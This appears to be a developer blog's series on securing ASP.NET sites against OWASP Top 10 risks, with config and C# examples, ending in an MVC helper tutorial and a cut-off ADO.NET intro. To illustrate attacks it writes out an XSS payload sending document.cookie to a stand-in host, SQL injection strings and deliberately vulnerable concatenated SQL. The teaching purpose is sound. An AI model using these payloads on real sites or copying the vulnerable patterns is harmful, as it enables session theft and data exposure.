Turn off GZIP

Chrome was trying to decompress .NET-issued JavaScript validation files that were already cached, which caused issues when refreshing the browser.

This caused the Page_Validators array (the .NET JavaScript validators) to be unset, so no client-side JavaScript validation ran.

You can prevent the Chrome/Firefox dev tools from caching content, but I chose to stop IIS from compressing the content within the web.config. Obviously don’t leave this on in production; only add it to the Web.Debug.config transform.

 <system.webServer>

 <urlCompression doStaticCompression="false" doDynamicCompression="false"/>

</system.webServer>

OWASP Top 10 #6 – Security Misconfiguration

What Is It?

Security misconfiguration is anything which is considered insecure due to the settings or configuration upon a server.

This can be anything from debug settings being turned on or even out of date third party frameworks being used.

Custom Errors

Leaking of information about the implemented technology stack could be an invitation for hackers to probe a system further. With regards to an SQL injection attack, error messages can be used to view details about the database schema such as table names and then further be used to display the contents of a database table.

Error messages displayed to a user should contain information useful to the user only and nothing else. They should report to the user the minimal amount of information needed for them to react to the error.

Any information such as details of the error or the trace stack should be hidden from the user.

We can disable the standard .NET ‘yellow’ error message which contains the trace stack and the details of the error on a site basis. This is done within the customErrors node of the web.config

<customErrors mode="On" defaultRedirect="Error.aspx" />

The mode attribute can contain the following values:

  • On
    • Custom errors are enabled. Errors are not reported in full; the user is redirected to the page defined within the defaultRedirect attribute.
  • Off
    • Errors are reported in full to all users.
  • RemoteOnly
    • Users viewing the site on their local host are reported the errors in full.
    • Users not viewing the site on their local host are redirected to the page defined within the defaultRedirect attribute. This is the default value.

If no defaultRedirect is provided the user is presented with an HTTP response code of 500. This in itself is bad as it highlights our site as worthy of more probing by a hacker; the status code is easily read by batch scripts probing sites.

Providing a defaultRedirect presents the user with the page defined by the attribute along with an HTTP status code of 302 (temporary redirect). This unfortunately creates a query string parameter of aspxerrorpath set to the relative URL of the page which caused the error, which can also easily be used by batch scripts to determine if a page is an error page.

We can redirect to the error page without indicating that there was an error by changing the redirectMode attribute from ResponseRedirect (the default) to ResponseRewrite.

<customErrors mode="On" defaultRedirect="Error.aspx" redirectMode="ResponseRewrite" />

With this set, the contents of the error page are simply returned as the response of the request without a redirect. The HTTP status code is 200 (OK). A hacker would need to read the contents of the page to try and determine if it is an error page, which is harder and slower. Anything we can do to slow down a hacker reduces the amount of probing they can do on our site.

Disabling Trace

Trace information allows collecting, viewing and analysing debug information that is collected and cached by ASP.NET. The information can be viewed at the bottom of individual pages or within the trace viewer, which is accessed by requesting the Trace.axd page from the root directory of the web site.

Like any debug information it contains details of the implemented technology, and potentially sensitive information that might be logged by accident. There are many instances of security issues where personal information, such as credit card details or the user accounts used in database connection strings, has been logged as part of the debugging.

Tracing should be disabled within the web.config for all production environments.

<trace enabled="false" />

Keep Frameworks/Third Party Code Up To Date

All third party frameworks should be kept up to date to ensure that you are protected from any security issues which have been fixed within them.

With the use of NuGet this can be achieved very easily.

Encrypting Sensitive Parts Of The Web.Config

Sensitive data such as user accounts, passwords and private keys that are contained within the web.config should be encrypted.

If they are accidentally exposed to a user during an error while accessing a page, or logged into an audit table and viewed by someone who should not see them, the details will not be readable.

It is also a good idea to reduce the number of people who have access to sensitive information.

You can encrypt a node of a web.config at the Visual Studio command prompt as follows:

aspnet_regiis -site "Site Name In IIS" -app "/" -pe "connectionStrings"

This will update the web.config replacing the sensitive information with an encrypted version.

The file can be decrypted with the following command:

aspnet_regiis -site "Site Name In IIS" -app "/" -pd "connectionStrings"

By default this process uses the RSAProtectedConfigurationProvider, whose key container is stored at machine level and is unique to the server; the section can therefore only be decrypted upon that web server (unless the key container is exported and imported elsewhere).

Using Config Transforms To Ensure Secure Configurations

It can be very easy to leave debug settings, such as tracing or custom errors being switched off, within a web.config.

Transforms for debug and release can be used to ensure that only settings for the required release are used when that release target is used.

Use Web.Release.Config to transform the Web.Config for release:

  • Remove debug attributes
  • Add custom errors
  • Remove trace

These transforms are only run during a site publish.
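A minimal Web.Release.config sketch using the XDT transform syntax might look like the following (the element values here are assumptions; use xdt:Transform="Insert" for nodes that do not already exist in the base web.config):

```xml
<?xml version="1.0"?>
<configuration xmlns:xdt="http://schemas.microsoft.com/XML-Document-Transform">
  <system.web>
    <!-- Strip the debug attribute from the compilation node -->
    <compilation xdt:Transform="RemoveAttributes(debug)" />
    <!-- Ensure custom errors are turned on for release -->
    <customErrors mode="On" defaultRedirect="Error.aspx" xdt:Transform="Replace" />
    <!-- Ensure tracing is disabled -->
    <trace enabled="false" xdt:Transform="Replace" />
  </system.web>
</configuration>
```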

Retail Mode

Retail mode can be used as a backstop to ensure that no web.config setting which is considered unsafe in a production environment is actually enabled. For example, in retail mode, turning off custom errors or turning on tracing will have no effect.

This setting can be set in the web.config though it is recommended to set it within the machine.config of the web server.

<deployment retail="true" />

OWASP Top 10 #5 – Cross Site Request Forgery (CSRF)

What Is It?

Before we talk about CSRF it is important to understand that all cookies created by a domain are sent back to that domain with every request, regardless of which domain the page making the request originated from. This includes authentication session cookies.

Hackers can simply change the action attribute of a form to be that of the domain/URL they are trying to breach. An unsuspecting site would only check that the authentication session token is valid. It would therefore be possible to use the user’s open session to perform malicious actions such as saving or reading data from a database.

How Can I Protect Myself From It?

Protection from CSRF attacks has a simple solution: send another, cryptographically secure token to the user along with the authentication session token. This token is sent both on the generated page and in a cookie.

Upon receiving a post back from a page, the server simply reads the CSRF token from the page and the cookie and ensures that they are identical.

As only a page generated from the site would contain the token, any fake page posting back to the server will be missing the correct CSRF token.
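The comparison itself can be sketched in a few lines of C# (an illustrative sketch only, not the framework’s actual implementation; the CsrfCheck class and TokensMatch method are hypothetical names). The loop runs in fixed time so an attacker cannot derive the token from response timings:

```csharp
using System;

public static class CsrfCheck
{
    // Compare the token posted in the form with the token in the cookie.
    // A fixed-time comparison avoids leaking information via timing.
    public static bool TokensMatch(string cookieToken, string formToken)
    {
        if (cookieToken == null || formToken == null) return false;
        if (cookieToken.Length != formToken.Length) return false;

        var diff = 0;
        for (var i = 0; i < cookieToken.Length; i++)
        {
            diff |= cookieToken[i] ^ formToken[i];
        }
        return diff == 0;
    }
}
```

In practice the framework helpers below do this for you; the sketch is only to show why a forged page, which cannot read the cookie, cannot supply a matching form token.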

MVC

The MVC helper method AntiForgeryToken generates a CSRF token and persists it in a cookie and a hidden input element on the page.

@using (Html.BeginForm())
{
  @Html.AntiForgeryToken()
}

Validation against a CSRF attack is made by decorating the controller’s action method with the ValidateAntiForgeryToken attribute.

[HttpPost]
[Authorize]
[ValidateAntiForgeryToken]
public ActionResult Index(McModel bigMac)
{
    return View();
}

If a CSRF attack is caught a System.Web.Mvc.HttpAntiForgeryException is thrown and the user is presented with a 500 status code.

ASP.NET Web Forms

A page written in ASP.NET Web Forms would traditionally need to manually generate the CSRF token, persist it and check that the tokens are identical when the page is posted back.

However we can now make use of the AntiForgery class.

https://msdn.microsoft.com/en-us/library/system.web.helpers.antiforgery%28v=vs.111%29.aspx

Within the aspx page a call to the GetHtml method generates the CSRF token, which is then persisted within a cookie and an input element upon the page.

<%= System.Web.Helpers.AntiForgery.GetHtml() %>

Validation against a CSRF attack is then performed during a page post back with the Validate method.

protected void Page_Load(object sender, EventArgs e)
{
    if (IsPostBack) {
        AntiForgery.Validate();
    }
}

Securing Cookies

Http Only Cookies

Using AntiForgery.GetHtml or @Html.AntiForgeryToken should create cookies which can be accessed by the server only and not via client-side script.

However, where a more manual approach has been taken to CSRF protection, it is important to ensure that the CSRF token cannot be read by a client-side script. If it can, a malicious page could read the token and simply add it to its form data before posting back to the server, circumventing our protection.

Cookies can be set as HttpOnly via a property during their creation:

var cookie = new HttpCookie(&quot;MyCookies&quot;, DateTime.Now.ToString());
cookie.HttpOnly = true;

Cookies can be set as HttpOnly globally for a website via the web.config:

<httpCookies domain="String" httpOnlyCookies="true" />

Note it is probably wise to set httpOnlyCookies to true regardless of your CSRF approach; storing any information within a cookie that can be read on the client side is probably a bad idea.

SSL Only Cookies

Where cookies contain sensitive information such as CSRF or authentication session tokens, it would be wise to enforce their transportation via SSL/HTTPS, preventing people from spying on the network traffic and stealing them.

This can be done globally for a site within the web.config:

<httpCookies domain="String" httpOnlyCookies="true" requireSSL="true" />

However, this approach might not always be possible. We can conditionally determine when to enforce SSL communication for cookies by checking the forms authentication settings and whether the connection is secure. The individual cookie can then be secured for SSL-only communication via the Secure property.

var cookie = new HttpCookie(&quot;MyCookies&quot;, DateTime.Now.ToString());
cookie.HttpOnly = true;

if (FormsAuthentication.RequireSSL && Request.IsSecureConnection) {
    cookie.Secure = true;
}

OWASP Top 10 #4 – Insecure Direct Object References

Direct Object Reference

A direct object reference is a key or id which is used to identify a piece or set of data. The data would typically be a record within a table of a database.

They can be:

  • Patterns such as incrementing integers/ids
  • Natural keys such as a username or email address.
  • Discoverable data such as a national insurance number or a social security number.

What Is it?

An insecure direct object reference is when a user accesses a direct object reference when they are not permitted to.

This can be from an unsecured page and an unauthenticated user. It can also come from a secured page and an authenticated user, where there are simply insufficient checks that they can view the data they have requested.

Quite often the user guesses or enumerates a direct object reference either manually or by an automated script.

If the data should only be visible to a subset of people then any request for that data should be validated to confirm the requester is permitted to see it. Simply relying on not displaying links to the user is not secure enough.

How Can I Protect Against It?

Validate Access

The first point to address is to validate that the user has permission to access the data.

For example; is the person permitted to see the financial records of the bank account in question?

Quite often the validation checks are placed around populating the UI to navigate to the data but no checks are placed around querying the data.

Indirect Reference Maps

A common approach to viewing database records on a web page is to expose the table fields and their direct object references in the URL:

https://www.MySite/Foo.aspx?id=1

Here an attacker can simply increment the id to try and view other people’s Foo records, since the ids are simple incrementing integers or identity indexes generated automatically by the database.

An indirect reference provides an abstraction between what is publicly observable in the URL and what is used to uniquely identify a record within a database.

A dictionary is used to store a map between the id and a randomly generated, cryptographically secure identifier. We then pass these secure identifiers to the user as part of the URLs which they can request.

https://www.MySite/Foo.aspx?id=ASWERDFMJSDGJSERSASKAWEOSDSDF

These keys should also be mapped to the user’s session to protect against the ids being leaked:

The following code shows how to generate a cryptographically secure unique id using the RNGCryptoServiceProvider class.

using System.Security.Cryptography;

var buffer = new byte[32];

using (var rng = new RNGCryptoServiceProvider())
{
    // GetBytes fills the supplied buffer; it does not return the bytes
    rng.GetBytes(buffer);
    map[id] = HttpServerUtility.UrlTokenEncode(buffer);
}

// Store the map within the user's session
HttpContext.Current.Session["Map"] = map;

In the example above it would be best to create only one instance of the RNGCryptoServiceProvider class regardless of how many direct object references are being made. Consider creating a class which implements IDisposable and calls Dispose upon its instance of RNGCryptoServiceProvider within its own Dispose method.

Obfuscation Via Non-Discoverable Keys

A compound natural key is a set of fields which, when used together, uniquely identifies a record. These are harder to guess than a single column with a distinctive pattern, such as an identity index which increments by one each time.

Compound keys require more space to index and are also slower to search upon; it is a trade-off between performance and security.

A random unique identifier such as a GUID is harder to guess but does not perform as well as an integer when searched upon. Also, for tables such as logs and audits which generate a high number of records, the indexes will become fragmented, and as such there will be more overhead from de-fragmenting them regularly.

OWASP Top 10 #3 – Broken Authentication & Session Management

How to secure .NET websites from broken authentication and session management security attacks.

Sessions In A Stateless Protocol

To understand broken authentication attacks such as session hijacking it is important to understand how a user is logged in and kept logged in within the stateless protocol HTTP.

HTTP is a stateless protocol, each request is independent of every other request. Any knowledge of previous requests and their contents is maintained outside of the bounds of the protocol.

ASP.NET maintains session data either on the client side in browser cookies, or on the server side in memory or within a database, and ties the data to the user via a session which is identified by a unique identifier.

Web sites which require a user to log in make use of a unique identifier or session token which is created during the authentication process, associated with the user’s account and then passed between the user’s web browser and the web server via a cookie.
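Where that server-side session data lives is configurable; a sketch of the sessionState element (the timeout value is an assumption):

```xml
<system.web>
  <!-- mode can be InProc (default, in server memory), StateServer,
       SQLServer or Custom; Off disables session state entirely -->
  <sessionState mode="InProc" timeout="20" />
</system.web>
```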

What Is It?

If the authentication session token is discovered by a potential attacker, it can be used to steal the user’s session, either by session fixation or by session hijacking.

Session hijacking is when an attacker gets hold of a session identifier and uses it to gain access to a user’s session and hence impersonate them.

Session fixation is when an attacker fixes a user’s session identifier to a known value, for example by passing a session identifier within the query string which overrides the one set in a cookie; once the user logs in, the attacker can use the fixed identifier to act as that user, with potentially elevated access.

Session ids can be passed between client and server by a query string parameter within a URL as well as cookies and form data.

How Can I Protect Myself From It?

Do Not Persist Session Tokens In The URL

Seeing as URLs are logged, shared and retrievable from a browser’s history, the first line of defence is not to persist session tokens in URLs; you should favour cookies.

Note that the default form method is GET; I have fixed many security issues which were caused simply by forgetting to set the method to POST.

Persist Session Tokens In Cookies

To get .NET to persist the session token within cookies you can set the cookieless attribute of the sessionState node to UseCookies within the web.config.

<system.web>
  <sessionState cookieless="UseCookies" />
</system.web>

The other options of the attribute are:

  • UseCookies (default)
    • Always use cookies regardless of device support
  • UseUri
    • Always use the URL regardless of device support
  • UseDeviceProfile
    • ASP.NET determines if cookies are supported by the browser and falls back to the URL if not
  • AutoDetect
    • ASP.NET determines if cookies are enabled in the browser and falls back to the URL if not

Note there is a difference between enabled and supported.

Note you should perhaps question whether users who are using browsers with no cookie support or with cookies disabled should be allowed to use your site.

Secure Cookies

All cookies should be set to HttpOnly; this prevents client-side script from reading their contents and as such reduces the chance of the contents being stolen by malicious code.

Cookies which contain session data should be configured to be served over SSL connections only.

Use ASP.NET Membership Provider For Authentication

Whenever security is concerned, it is important to use tried and tested frameworks in favour of writing your own.

The .NET membership provider is built into ASP.NET and should be favoured.

It contains the following functionality:

  • Automatic schema creation upon first usage
  • Default website projects which are set up to allow:
    • Creating user accounts
    • User login/log out
  • Session persistence between page requests
  • Automatic page/URL protection from non-logged-in users or users not within a user group
  • User groups for more granular permissions

Automatically Logout Expired Sessions

A session token should only be considered valid for the minimum viable amount of time possible. If a session token is leaked, the smaller the window in which it is exploitable, the lower the chance of the session being hijacked.

You can set the forms login session length in minutes within the web.config:

<forms loginUrl="~/Account/Login" timeout="30" />

By default the timeout is sliding: the session expires after the configured amount of time has passed since the last request was made.

It is possible to change the timeout to be fixed, expiring after the configured amount of time has passed since the user logged in.

<forms slidingExpiration="false" />

OWASP Top 10 # 2 – Cross Site Scripting (XSS)

Cross Site Scripting (XSS)

What is it?

Cross-site Scripting (XSS) is a variation of a code injection attack where an attacker injects client-side script onto a vulnerable website which is later unintentionally executed by a user.

The client side script could be VBScript, ActiveX, Flash or JavaScript.

The attack makes use of unvalidated or unencoded user input which is outputted by the website and then executed by the user’s web browser.

How does it happen?

In its simplest form a script is taken from a query string parameter:

www.foo.com/foo.aspx?q=foo<script>location.href = 'http://BadSite/DoSomethingBad.html?cookie='%2Bdocument.cookie</script>

Here our query string parameter contains a malicious payload:

<script>location.href = 'http://foo/dosomethingbad.html?cookie='%2Bdocument.cookie</script>

Rendering the requested parameter value as-is within the outputted HTML in the client browser, i.e. without any encoding, will cause the script to be executed.

Here we show how an injected script could pass the value of a cookie to our hacker’s site:

<span>
    You searched for <script>location.href = 'http://foo/dosomethingbad.html?cookie='%2Bdocument.cookie</script>
</span>

This cookie value could contain an authorisation token or other sensitive data which could be used to exploit the user further.

Sources of an attack

The client side script or malicious payload can come from many sources:

  • In the URL via a query string or route parameter
  • Http form posted
  • In cookies
  • Http request headers
  • Web services calls
  • Persisted in databases
  • Files such as XML, XSD, CSV

In fact, anything which does not come directly from our source code should be treated as potentially malicious. That includes data and services from within the bounds of our company, as well as data entered directly by our users, even if they are colleagues operating back office software.

How can I protect myself from this?

Protection from an attack should be multi-layered to maximise its effectiveness; any breached layer is then simply one of many layers providing protection.

Output encoding

The primary method of mitigating XSS attacks is to contextually escape untrusted and potentially unsafe data. This involves replacing certain string characters with their equivalent escaped, safe characters.

For example, with an HTML encoding scheme the character > is replaced with &gt;.

The string

<b>Hello</b>

would be replaced with

&lt;b&gt;Hello&lt;/b&gt;

The string would then be displayed as

<b>Hello</b>

without the bold markup being executed and the word Hello being rendered in bold. The potentially malicious payload is made harmless.
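This round trip can be demonstrated with the framework’s System.Net.WebUtility (a minimal console sketch; for untrusted input the AntiXssEncoder described below is preferable):

```csharp
using System;
using System.Net;

public static class EncodingDemo
{
    public static void Main()
    {
        // Encode the markup so a browser renders it as literal text
        var encoded = WebUtility.HtmlEncode("<b>Hello</b>");
        Console.WriteLine(encoded); // &lt;b&gt;Hello&lt;/b&gt;
    }
}
```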

There are several encoding schemes and the right one should be chosen depending upon where the untrusted user input is to be rendered into. These include HTML, JavaScript, CSS, URL and XML.

It is important that you use a well-proven library to implement output encoding and do not try to write your own.

Encoding HTML

As of .NET 4.5 the AntiXSS encoder is built into the .NET framework.

using System.Web.Security.AntiXss;

var encodedString = AntiXssEncoder.HtmlEncode(inputString, true);

The second parameter determines whether to use named entities; for example, with it set to true the copyright symbol is encoded as &copy;.

In previous versions of .NET you need to download the AntiXSS library, which can be found on NuGet.

Html Encode

The .NET framework also includes HttpUtility.HtmlEncode and Server.HtmlEncode.

Please do not use these as they only encode the characters <, >, " and &. This approach is not sufficient to prevent XSS attacks; for example, JavaScript such as alert('smerfs'); injected into a single-quoted attribute of an input element would still be executed.

JavaScript

Even in .NET 4.5, the anti-XSS capability does not extend to escaping JavaScript; you need to download the external AntiXSS library.

var q = <%= Microsoft.Security.Application.Encoder.JavaScriptEncode(Request.QueryString["foo"]) %>

Self Escaping Web forms controls in System.Web.UI

When working with ASP.NET WebForms, some controls and their properties encode html, the following page highlights which do and which do not:

https://blogs.msdn.microsoft.com/sfaust/2008/09/02/which-asp-net-controls-automatically-encodes/

Output encoding in MVC

The Razor view engine automatically HTML encodes output by default.

// the following automatically escapes
@Html.Label("<b>Hello</b>")

In the very rare circumstances where you do not want encoding to occur, you can explicitly override this functionality.

// Request non escaping with the raw command.
@Html.Raw("<b>Hello</b>")

White listing allowable values

When collecting information from a user you should validate their input against a list of known safe values. This allows us to catch any bad data very early on in the process.

Validation can be type conversion, regular expressions or even checking their inclusion from a list of known values such as colours or countries.

The following examines whether an input string is valid:

if (!Regex.IsMatch(searchTerm, @"^[\p{L} \.\-]+$"))
{
   throw new ApplicationException("The search term is not allowed");
}
  • \p{L} matches any kind of letter from any language
  • \. matches the period character
  • \- matches the hyphen character
  • + indicates one or more of these characters
  • ^ and $ indicate that the input string starts and ends with these characters, i.e. contains only these characters.
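Applied to a couple of inputs, the whitelist check behaves as follows (a small self-contained sketch; the class and method names are illustrative):

```csharp
using System;
using System.Text.RegularExpressions;

public static class WhitelistDemo
{
    // Letters from any language, spaces, periods and hyphens only
    private const string Pattern = @"^[\p{L} \.\-]+$";

    public static bool IsValidSearchTerm(string searchTerm) =>
        Regex.IsMatch(searchTerm, Pattern);

    public static void Main()
    {
        Console.WriteLine(IsValidSearchTerm("Jean-Luc Picard"));           // True
        Console.WriteLine(IsValidSearchTerm("<script>alert(1)</script>")); // False
    }
}
```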

Request Validation

.NET provides request validation, an inbuilt protection against XSS that looks at all incoming data from forms, query string parameters, route sections, header values etc. It will catch XSS attacks before they reach your page.

This is enabled or disabled within the web.config:

<pages validateRequest="true" />

This functionality has been available and enabled by default since ASP.NET 1.1.

ASP.NET will automatically throw an HttpRequestValidationException when it detects an XSS attack.

The method System.Web.HttpRequest.ValidateString is used to perform the check and raise the exception.

Disabling Request Validation

Disabling Request Validation At The Page Level

We can disable request validation on a page level:

<%@ Page Title="" ValidateRequest="false" Language="C#" %>

Disabling Request Validation At The Control Level

We can disable validation for a specific control.

<asp:Button ID="myButton" runat="server" ValidateRequestMode="Disabled" />

This is an ASP.NET 4.5 feature and needs the request validation mode changing from 2.0 to 4.5:

<system.web>
  <httpRuntime targetFramework="4.5" requestValidationMode="4.5" />
</system.web>

Disabling Request Validation When Requesting Data

We can disable the validation when reading data sent within the HTTP request. This is done by going through the Unvalidated property before any access to the HTTP request data.

var foo = Request.Unvalidated.QueryString["foo"];

Disabling Request Validation In MVC

We can disable request validation on model binding in MVC:

public class MyController : Controller {
    [HttpPost]
    public ActionResult DoFoo(MyModel model)
    {
        return View();
    }
}

public class MyModel {
    [AllowHtml]
    public string MyField { get; set; }
}

The AllowHtml attribute placed on a model’s field will allow that field to be bound to incoming data regardless of its contents.

The default action is to disallow unsafe data; an exception will be thrown if the incoming data is deemed unsafe.

Other Encoding

The Anti-XSS library contains other methods for encoding data against XSS for URL, XML and other schemes.

More information can be found here:

https://msdn.microsoft.com/en-us/library/system.web.security.antixss.antixssencoder_methods%28v=vs.110%29.aspx

OWASP Top 10 #1 – Injection Attacks

Injection

What is it?

An injection attack is where a program, database or interpreter is tricked into executing code or performing functionality which was not intended to be run.

Though SQL injection is probably the most commonly known type of injection attack, it is a vulnerability that can affect many technologies:

  • SQL
  • XPath
  • LDAP
  • Applications / Operating Systems

SQL injection is when a query or command parameter which should contain a simple variable value actually contains additional syntax which is inadvertently executed by the database.

How does it happen?

For many web applications a URL such as http://www.TheFooSite.com/MyDatabaseTable?Id=1 would be translated into a query such as:

Select * From MyDatabaseTable Where Id = 1

The value of the id has come from the user and as such could contain any malicious payload.

For example, we can change the SQL query to return all the data within the table:

http://www.TheFooSite.com/MyDatabaseTable?Id=1 or 1=1

Alternatively we could make the database throw an error which could propagate to the user and reveal our technology stack; this in turn would invite any potential hacker to start a more in-depth probe:

http://www.TheFooSite.com/MyDatabaseTable?Id=x

Additionally we could append queries against schema tables such as sysobjects and start to expose our database structure to the user. This could then be used to build further queries which expose the potentially sensitive data contained within these tables, such as credit card numbers and identity numbers:

http://www.TheFooSite.com/MyDatabaseTable?Id=SELECT name FROM master..sysobjects WHERE xtype = 'U';
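The danger is easy to see when the query is built by string concatenation; as a minimal sketch (the table name is from the example above, the variable names are illustrative):

```csharp
using System;

// The attacker-supplied value becomes part of the query syntax itself.
var id = "1 or 1=1"; // in a real application this comes from the query string
var sql = "Select * From MyDatabaseTable Where Id = " + id;

Console.WriteLine(sql); // Select * From MyDatabaseTable Where Id = 1 or 1=1
```

The resulting string is a perfectly valid query which the database will happily execute, returning every row in the table.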

Untrusted data sources

Any information which comes from the user, third party or external entity should be considered as untrusted and therefore potentially dangerous.

The sources of untrusted data are numerous:

  • From the user
    • In the URL via a query string or route parameter
    • Posted via a form
  • From the browser
    • In cookies
    • In the request headers
  • Web services calls
  • Database
  • Files such as XML, XSD, CSV

In fact anything which does not come directly from our running source code should be treated as potentially malicious. That includes data and services from within the bounds of our company as well as data entered directly by our users, even if they are our colleagues.

How can I protect myself from this?

Security is all about addressing the security concern at multiple levels; this way if one level is breached there are more levels which can catch the breach.

The principle of least privilege

The principle of least privilege is about giving any entity the minimum level of permissions it requires to perform its job.

Why grant the user account used by a web application the ability to query an entire database, delete data, modify schema or even grant administrator level access? By granting the minimum level of permissions you dramatically reduce the level of damage that a breach can cause.

Don’t give the account db_owner access; this can read, update, delete, truncate and drop any table as well as execute any stored procedures and modify the schema.

A user account should be given access to:

  • Read from only the individual table(s) required
  • Write to only the individual table(s) required
  • Execute only the individual stored procedures required

Any account accessed by a web application should probably never be given access to modify any schema, read or write to any schema or system tables and should probably not even be given access to physically delete data from any tables.

If you need to delete data, consider marking records as deleted by a status field and archiving off the records by a system task running in the background.

Where different levels of access are required between types of user account groups or roles, consider having multiple accounts. For example a public account used by public user groups and an admin account which is used by back office staff.

Please note: just because the user role is ‘admin’ it does not mean they should be given anything but the bare minimum permissions within the database.
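As an illustrative sketch (the account and object names here are hypothetical), the grants for such an account might look like:

```sql
-- Grant only the minimum required permissions to the web application account.
GRANT SELECT, INSERT, UPDATE ON dbo.MyTable TO WebAppUser;
GRANT EXECUTE ON dbo.spGetFoo TO WebAppUser;
-- No DELETE, no db_owner membership, no rights on schema or system tables.
```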

In line SQL parametrisation

Most issues from SQL injection are from parameters being attached to the query or command via string concatenation. Take the following example which concatenates a parameter taken from the user via a URL query string parameter.

var id = Request.QueryString["Id"];
var sqlCommand = "SELECT * FROM MyTable WHERE id = " + id;

The data within the parameter is run as is within the database allowing the data within the parameter to break out of its parameter scope and into a query scope.

For example, “1 or 1=1” will be executed as if it were two parts of a predicate.

By parametrising the query, the data contained within the parameter stays within the scope of the parameter; the database will try to find an id equal to “1 or 1=1”, which will either retrieve no data or throw an error when converting between data types.

The following shows how we can parametrise an in line query:

var id = Request.QueryString["id"];

var sqlString = "SELECT * FROM Foo WHERE Id = @id";

using (var connection = new SqlConnection(connString))
{
    using (var command = new SqlCommand(sqlString, connection))
    {
        command.Parameters.Add("@id", SqlDbType.VarChar).Value = id;
        command.Connection.Open();
        var data = command.ExecuteReader();
    }
}

An error is now thrown by the database as it cannot convert the string “1 or 1=1” into an integer, the data type of the id field.

Stored procedure Parametrisation

The problem with in line parametrised queries is that you have to remember to write them this way. Stored procedures enforce this step.

var id = Request.QueryString["id"];

var sqlString = "GetFoo";
using (var conn = new SqlConnection(connString))
{
    using (var command = new SqlCommand(sqlString, conn))
    {
        command.CommandType = CommandType.StoredProcedure;
        command.Parameters.Add("@id", SqlDbType.VarChar).Value = id;
        command.Connection.Open();
        var data = command.ExecuteReader();
    }
}

This causes the same behaviour: our malicious string cannot be converted to an integer.

White listing untrusted data

Where possible, all untrusted data should always be validated against a white list of known safe values.

A white list is a set of rules which defines valid data. Any incoming data must pass validation against these rules to be considered safe; any data failing validation should be treated as a potential attack.

There are multiple ways of performing white listing:

  • Type conversion
    • Integer, date, GUID
  • Regular expression
    • Email address, phone number, name
  • Enumerated list of known good values
    • Titles, countries and colours for example
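As a sketch, each of these white listing approaches might look like the following; the specific pattern and list of titles are illustrative only:

```csharp
using System;
using System.Linq;
using System.Text.RegularExpressions;

// 1. Type conversion: the value must parse as an integer.
bool IsValidId(string input) => int.TryParse(input, out _);

// 2. Regular expression: an optional leading + followed by digits and spaces.
bool IsValidPhone(string input) => Regex.IsMatch(input, @"^\+?[0-9 ]{6,15}$");

// 3. Enumerated list of known good values.
var knownTitles = new[] { "Mr", "Mrs", "Ms", "Dr" };
bool IsValidTitle(string input) => knownTitles.Contains(input);

Console.WriteLine(IsValidId("1 or 1=1")); // False
```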

The following shows how we can use the TryParse method to white list our id parameter by trying to convert it to an integer:

var idString = Request.QueryString["id"];

int id;
if (!int.TryParse(idString, out id))
{
    throw new Exception("The id is not a valid integer.");
}

Note: any errors should be handled, audited where required, and the user shown a human readable message which gives nothing away about our technology stack or the details of the error.

Now that we have the parameter as integer we can add our parameter into the command as an integer:

command.Parameters.Add("@id", SqlDbType.Int).Value = id;

Any suspect attack is now caught well before it reaches the database, which is a good place to be.

ORMs

ORMs automatically parametrise any SQL they generate.

The only thing to note is that when using ORMs it is often necessary to drop to native SQL for performance reasons. When doing this, care should be taken to ensure all untrusted data is parametrised using the steps above.

Injection through stored procedures

Care should be taken when using stored procedures that they are not themselves concatenating parameters before calling exec.

declare @query varchar(max)
set @query = 'select * from dbo.MyTable where MyField like ''%' + @parameter + '%'''
EXEC(@query)

The stored procedure sp_executesql allows parametrising SQL statements which are held as strings.

declare @query nvarchar(max)
set @query = 'select * from dbo.Foo where MyField like ''%'' + @search + ''%'''

EXEC sp_executesql @query, N'@search varchar(50)', @search = @parameter

Automated SQL injection tools

There are a number of tools which can automate the hacking process, allowing people with next to no technical experience to perform automated attacks or to test the strength of web applications.

Best SQL Injection Tools

Self Closing MVC Html Helpers

The following is an example of how to write a self closing MVC Html helper similar to BeginForm(). It takes the form of a self closing DIV tag; in fact we will write a Bootstrap panel.

We will take advantage of IDisposable; the Dispose method will write our closing div tag.

First we create a class which is passed an Action that will write our end tag; this class implements IDisposable and calls our required action from Dispose.

using System;

namespace WebApps.HtmlHelpers
{
  internal class DisposableHtmlHelper : IDisposable
  {
    private readonly Action _end;

    public DisposableHtmlHelper(Action end)
    {
      _end = end;
    }

    public void Dispose()
    {
      _end();
    }
  }
}

Now we write our helper methods: a BeginPanel method which writes a div tag to the ViewContext response stream. It returns an instance of our newly created DisposableHtmlHelper, registered with the method which will write our closing tag.

using System;
using System.Web.Mvc;

namespace WebApps.HtmlHelpers
{
  public static class HtmlHelpers
  {
    public static IDisposable BeginPanel(this HtmlHelper htmlHelper)
    {
      htmlHelper.ViewContext.Writer.Write(@"<div class=""panel panel-default"">");

      return new DisposableHtmlHelper(htmlHelper.EndPanel);
    }

    public static void EndDiv(this HtmlHelper htmlHelper)
    {
      htmlHelper.ViewContext.Writer.Write("</div>");
    }

    public static void EndPanel(this HtmlHelper htmlHelper)
    {
      htmlHelper.EndDiv();
    }
  }
}

We can now call this within a using statement in our view.

@using (Html.BeginPanel()) {
 // Monkey business would be here
}
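The mechanics can be seen without any MVC dependencies; this is a minimal sketch of the same pattern (the DisposableTag class is illustrative, not part of the helper above), where the opening tag is written up front and the closing tag is written when Dispose runs at the end of the using block:

```csharp
using System;
using System.IO;

var sw = new StringWriter();
using (new DisposableTag(sw, "div"))
{
    sw.Write("content");
}
Console.WriteLine(sw.ToString()); // <div>content</div>

class DisposableTag : IDisposable
{
    private readonly TextWriter _writer;
    private readonly string _tag;

    public DisposableTag(TextWriter writer, string tag)
    {
        _writer = writer;
        _tag = tag;
        _writer.Write($"<{tag}>"); // opening tag written immediately
    }

    public void Dispose() => _writer.Write($"</{_tag}>"); // closing tag on scope exit
}
```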

ADO.NET – Connected Layer

Intro

The connected layer provides functionality for running SQL syntax against a connected database. The statements can be select, insert, update or delete, as well as schema statements, stored procedures and functions.

The connected layer requires the database connection to remain open while the database transactions are being performed.

Source Code

All source code can be found on GitHub here.

This is part of my HowTo in .NET series. An overview can be seen here.

Command Objects

The Command object represents a SQL statement to be run; select, insert, update, delete, execute schema, execute stored procedure etc.

The DbCommand is configured to execute an SQL statement or stored procedure via the CommandText property.

The CommandType property defines the type of the statement held within CommandText.

  • StoredProcedure
    • CommandText contains the name of a stored procedure or user defined function.
  • TableDirect
    • CommandText contains a table name. All rows and columns will be returned from the table.
  • Text
    • CommandText contains an SQL statement to be executed.

The CommandType defaults to Text; however, it is good practice to set it explicitly.

var connectionDetails =
    ConfigurationManager.ConnectionStrings["MyDatabase"];

